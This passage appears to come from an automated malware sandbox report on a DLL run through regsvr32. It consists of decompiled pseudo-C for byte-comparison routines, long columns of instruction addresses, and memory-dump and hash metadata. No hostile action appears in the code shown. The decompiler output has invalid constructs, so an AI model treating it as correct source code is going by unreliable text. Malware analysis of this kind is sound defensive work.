						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                                                                                                                0x1003e2e9
                                                                                                                0x1003e2e9
                                                                                                                0x1003e2ef
                                                                                                                0x1003e36e
                                                                                                                0x1003e370
                                                                                                                0x1003e372
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e378
                                                                                                                0x1003e37e
                                                                                                                0x1003e3fd
                                                                                                                0x1003e3ff
                                                                                                                0x1003e401
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e407
                                                                                                                0x1003e40d
                                                                                                                0x1003e48c
                                                                                                                0x1003e48e
                                                                                                                0x1003e490
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e496
                                                                                                                0x1003e49c
                                                                                                                0x1003e51b
                                                                                                                0x1003e51d
                                                                                                                0x1003e51f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e525
                                                                                                                0x1003e52b
                                                                                                                0x1003e5aa
                                                                                                                0x1003e5ac
                                                                                                                0x1003e5ae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e5ba
                                                                                                                0x1003e63a
                                                                                                                0x1003e63c
                                                                                                                0x1003e63e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e644
                                                                                                                0x1003e64a
                                                                                                                0x1003e6c9
                                                                                                                0x1003e6cb
                                                                                                                0x1003e6cd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e6db
                                                                                                                0x1003ded5
                                                                                                                0x1003ded7
                                                                                                                0x1003ec33
                                                                                                                0x1003ec33
                                                                                                                0x1003e6e9
                                                                                                                0x1003e6eb
                                                                                                                0x1003e2c7
                                                                                                                0x1003e2cf
                                                                                                                0x1003e2d1
                                                                                                                0x1003e2e2
                                                                                                                0x1003e2e2
                                                                                                                0x00000000
                                                                                                                0x1003e2d1
                                                                                                                0x1003e6f8
                                                                                                                0x1003e6fe
                                                                                                                0x1003eb17
                                                                                                                0x00000000
                                                                                                                0x1003eb17
                                                                                                                0x00000000
                                                                                                                0x1003e704
                                                                                                                0x1003e653
                                                                                                                0x1003e655
                                                                                                                0x1003e66c
                                                                                                                0x1003e674
                                                                                                                0x1003e676
                                                                                                                0x1003e68d
                                                                                                                0x1003e695
                                                                                                                0x1003e697
                                                                                                                0x1003e6ae
                                                                                                                0x1003e6b6
                                                                                                                0x1003e6b8
                                                                                                                0x1003e6c5
                                                                                                                0x1003e6c5
                                                                                                                0x00000000
                                                                                                                0x1003e6b8
                                                                                                                0x1003e6a4
                                                                                                                0x1003e6a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e6a8
                                                                                                                0x1003e683
                                                                                                                0x1003e687
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e687
                                                                                                                0x1003e662
                                                                                                                0x1003e666
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e666
                                                                                                                0x1003e5c4
                                                                                                                0x1003e5c6
                                                                                                                0x1003e5dd
                                                                                                                0x1003e5e5
                                                                                                                0x1003e5e7
                                                                                                                0x1003e5fe
                                                                                                                0x1003e606
                                                                                                                0x1003e608
                                                                                                                0x1003e61f
                                                                                                                0x1003e627
                                                                                                                0x1003e629
                                                                                                                0x1003e636
                                                                                                                0x1003e636
                                                                                                                0x00000000
                                                                                                                0x1003e629
                                                                                                                0x1003e615
                                                                                                                0x1003e619
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e619
                                                                                                                0x1003e5f4
                                                                                                                0x1003e5f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e5f8
                                                                                                                0x1003e5d3
                                                                                                                0x1003e5d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e5d7
                                                                                                                0x1003e534
                                                                                                                0x1003e536
                                                                                                                0x1003e54d
                                                                                                                0x1003e555
                                                                                                                0x1003e557
                                                                                                                0x1003e56e
                                                                                                                0x1003e576
                                                                                                                0x1003e578
                                                                                                                0x1003e58f
                                                                                                                0x1003e597
                                                                                                                0x1003e599
                                                                                                                0x1003e5a6
                                                                                                                0x1003e5a6
                                                                                                                0x00000000
                                                                                                                0x1003e599
                                                                                                                0x1003e585
                                                                                                                0x1003e589
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e589
                                                                                                                0x1003e564
                                                                                                                0x1003e568
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e568
                                                                                                                0x1003e543
                                                                                                                0x1003e547
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e547
                                                                                                                0x1003e4a5
                                                                                                                0x1003e4a7
                                                                                                                0x1003e4be
                                                                                                                0x1003e4c6
                                                                                                                0x1003e4c8
                                                                                                                0x1003e4df
                                                                                                                0x1003e4e7
                                                                                                                0x1003e4e9
                                                                                                                0x1003e500
                                                                                                                0x1003e508
                                                                                                                0x1003e50a
                                                                                                                0x1003e517
                                                                                                                0x1003e517
                                                                                                                0x00000000
                                                                                                                0x1003e50a
                                                                                                                0x1003e4f6
                                                                                                                0x1003e4fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e4fa
                                                                                                                0x1003e4d5
                                                                                                                0x1003e4d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e4d9
                                                                                                                0x1003e4b4
                                                                                                                0x1003e4b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e4b8
                                                                                                                0x1003e416
                                                                                                                0x1003e418
                                                                                                                0x1003e42f
                                                                                                                0x1003e437
                                                                                                                0x1003e439
                                                                                                                0x1003e450
                                                                                                                0x1003e458
                                                                                                                0x1003e45a
                                                                                                                0x1003e471
                                                                                                                0x1003e479
                                                                                                                0x1003e47b
                                                                                                                0x1003e488
                                                                                                                0x1003e488
                                                                                                                0x00000000
                                                                                                                0x1003e47b
                                                                                                                0x1003e467
                                                                                                                0x1003e46b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e46b
                                                                                                                0x1003e446
                                                                                                                0x1003e44a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e44a
                                                                                                                0x1003e425
                                                                                                                0x1003e429
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e429
                                                                                                                0x1003e387
                                                                                                                0x1003e389
                                                                                                                0x1003e3a0
                                                                                                                0x1003e3a8
                                                                                                                0x1003e3aa
                                                                                                                0x1003e3c1
                                                                                                                0x1003e3c9
                                                                                                                0x1003e3cb
                                                                                                                0x1003e3e2
                                                                                                                0x1003e3ea
                                                                                                                0x1003e3ec
                                                                                                                0x1003e3f9
                                                                                                                0x1003e3f9
                                                                                                                0x00000000
                                                                                                                0x1003e3ec
                                                                                                                0x1003e3d8
                                                                                                                0x1003e3dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e3dc
                                                                                                                0x1003e3b7
                                                                                                                0x1003e3bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e3bb
                                                                                                                0x1003e396
                                                                                                                0x1003e39a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e2f1
                                                                                                                0x1003e2f1
                                                                                                                0x1003e2f4
                                                                                                                0x1003e2f8
                                                                                                                0x1003e2fa
                                                                                                                0x1003e311
                                                                                                                0x1003e311
                                                                                                                0x1003e315
                                                                                                                0x1003e319
                                                                                                                0x1003e31b
                                                                                                                0x1003e332
                                                                                                                0x1003e332
                                                                                                                0x1003e336
                                                                                                                0x1003e33a
                                                                                                                0x1003e33c
                                                                                                                0x1003e353
                                                                                                                0x1003e353
                                                                                                                0x1003e357
                                                                                                                0x1003e35b
                                                                                                                0x1003e35d
                                                                                                                0x1003e363
                                                                                                                0x1003e366
                                                                                                                0x1003e36a
                                                                                                                0x1003e36a
                                                                                                                0x00000000
                                                                                                                0x1003e35d
                                                                                                                0x1003e342
                                                                                                                0x1003e345
                                                                                                                0x1003e349
                                                                                                                0x1003e34d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e34d
                                                                                                                0x1003e321
                                                                                                                0x1003e324
                                                                                                                0x1003e328
                                                                                                                0x1003e32c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e32c
                                                                                                                0x1003e300
                                                                                                                0x1003e303
                                                                                                                0x1003e307
                                                                                                                0x1003e30b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e30b
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction ID: 06533223066f455be3a1f7e95cfcf3cdbef0f6b12c1fe5cebf42f92fef6d6eaa
                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction Fuzzy Hash: 2BD15FB3C0A9F34E8377C52D505822FEAA2EFC169271BC7E1DCD42F289D6265E0495D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003DEDD Relevance: .4, Instructions: 361COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003DEDD(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                                                                                                                0x1003dedd
                                                                                                                0x1003dedd
                                                                                                                0x1003dee3
                                                                                                                0x1003df62
                                                                                                                0x1003df64
                                                                                                                0x1003df66
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003df6c
                                                                                                                0x1003df72
                                                                                                                0x1003dff1
                                                                                                                0x1003dff3
                                                                                                                0x1003dff5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dffb
                                                                                                                0x1003e001
                                                                                                                0x1003e080
                                                                                                                0x1003e082
                                                                                                                0x1003e084
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e08a
                                                                                                                0x1003e090
                                                                                                                0x1003e10f
                                                                                                                0x1003e111
                                                                                                                0x1003e113
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e119
                                                                                                                0x1003e11f
                                                                                                                0x1003e19e
                                                                                                                0x1003e1a0
                                                                                                                0x1003e1a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e1ae
                                                                                                                0x1003e22e
                                                                                                                0x1003e230
                                                                                                                0x1003e232
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e238
                                                                                                                0x1003e23e
                                                                                                                0x1003e2bd
                                                                                                                0x1003e2bf
                                                                                                                0x1003e2c1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e2cf
                                                                                                                0x1003e2d1
                                                                                                                0x1003e2e2
                                                                                                                0x1003e2e2
                                                                                                                0x1003ded7
                                                                                                                0x1003ec33
                                                                                                                0x1003ec33
                                                                                                                0x1003e247
                                                                                                                0x1003e249
                                                                                                                0x1003e260
                                                                                                                0x1003e268
                                                                                                                0x1003e26a
                                                                                                                0x1003e281
                                                                                                                0x1003e289
                                                                                                                0x1003e28b
                                                                                                                0x1003e2a2
                                                                                                                0x1003e2aa
                                                                                                                0x1003e2ac
                                                                                                                0x1003e2b9
                                                                                                                0x1003e2b9
                                                                                                                0x00000000
                                                                                                                0x1003e2ac
                                                                                                                0x1003e298
                                                                                                                0x1003e29c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e29c
                                                                                                                0x1003e277
                                                                                                                0x1003e27b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e27b
                                                                                                                0x1003e256
                                                                                                                0x1003e25a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e25a
                                                                                                                0x1003e1b8
                                                                                                                0x1003e1ba
                                                                                                                0x1003e1d1
                                                                                                                0x1003e1d9
                                                                                                                0x1003e1db
                                                                                                                0x1003e1f2
                                                                                                                0x1003e1fa
                                                                                                                0x1003e1fc
                                                                                                                0x1003e213
                                                                                                                0x1003e21b
                                                                                                                0x1003e21d
                                                                                                                0x1003e22a
                                                                                                                0x1003e22a
                                                                                                                0x00000000
                                                                                                                0x1003e21d
                                                                                                                0x1003e209
                                                                                                                0x1003e20d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e20d
                                                                                                                0x1003e1e8
                                                                                                                0x1003e1ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e1ec
                                                                                                                0x1003e1c7
                                                                                                                0x1003e1cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e1cb
                                                                                                                0x1003e128
                                                                                                                0x1003e12a
                                                                                                                0x1003e141
                                                                                                                0x1003e149
                                                                                                                0x1003e14b
                                                                                                                0x1003e162
                                                                                                                0x1003e16a
                                                                                                                0x1003e16c
                                                                                                                0x1003e183
                                                                                                                0x1003e18b
                                                                                                                0x1003e18d
                                                                                                                0x1003e19a
                                                                                                                0x1003e19a
                                                                                                                0x00000000
                                                                                                                0x1003e18d
                                                                                                                0x1003e179
                                                                                                                0x1003e17d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e17d
                                                                                                                0x1003e158
                                                                                                                0x1003e15c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e15c
                                                                                                                0x1003e137
                                                                                                                0x1003e13b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e13b
                                                                                                                0x1003e099
                                                                                                                0x1003e09b
                                                                                                                0x1003e0b2
                                                                                                                0x1003e0ba
                                                                                                                0x1003e0bc
                                                                                                                0x1003e0d3
                                                                                                                0x1003e0db
                                                                                                                0x1003e0dd
                                                                                                                0x1003e0f4
                                                                                                                0x1003e0fc
                                                                                                                0x1003e0fe
                                                                                                                0x1003e10b
                                                                                                                0x1003e10b
                                                                                                                0x00000000
                                                                                                                0x1003e0fe
                                                                                                                0x1003e0ea
                                                                                                                0x1003e0ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e0ee
                                                                                                                0x1003e0c9
                                                                                                                0x1003e0cd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e0cd
                                                                                                                0x1003e0a8
                                                                                                                0x1003e0ac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e0ac
                                                                                                                0x1003e00a
                                                                                                                0x1003e00c
                                                                                                                0x1003e023
                                                                                                                0x1003e02b
                                                                                                                0x1003e02d
                                                                                                                0x1003e044
                                                                                                                0x1003e04c
                                                                                                                0x1003e04e
                                                                                                                0x1003e065
                                                                                                                0x1003e06d
                                                                                                                0x1003e06f
                                                                                                                0x1003e07c
                                                                                                                0x1003e07c
                                                                                                                0x00000000
                                                                                                                0x1003e06f
                                                                                                                0x1003e05b
                                                                                                                0x1003e05f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e05f
                                                                                                                0x1003e03a
                                                                                                                0x1003e03e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e03e
                                                                                                                0x1003e019
                                                                                                                0x1003e01d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e01d
                                                                                                                0x1003df7b
                                                                                                                0x1003df7d
                                                                                                                0x1003df94
                                                                                                                0x1003df9c
                                                                                                                0x1003df9e
                                                                                                                0x1003dfb5
                                                                                                                0x1003dfbd
                                                                                                                0x1003dfbf
                                                                                                                0x1003dfd6
                                                                                                                0x1003dfde
                                                                                                                0x1003dfe0
                                                                                                                0x1003dfed
                                                                                                                0x1003dfed
                                                                                                                0x00000000
                                                                                                                0x1003dfe0
                                                                                                                0x1003dfcc
                                                                                                                0x1003dfd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dfd0
                                                                                                                0x1003dfab
                                                                                                                0x1003dfaf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dfaf
                                                                                                                0x1003df8a
                                                                                                                0x1003df8e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003dee5
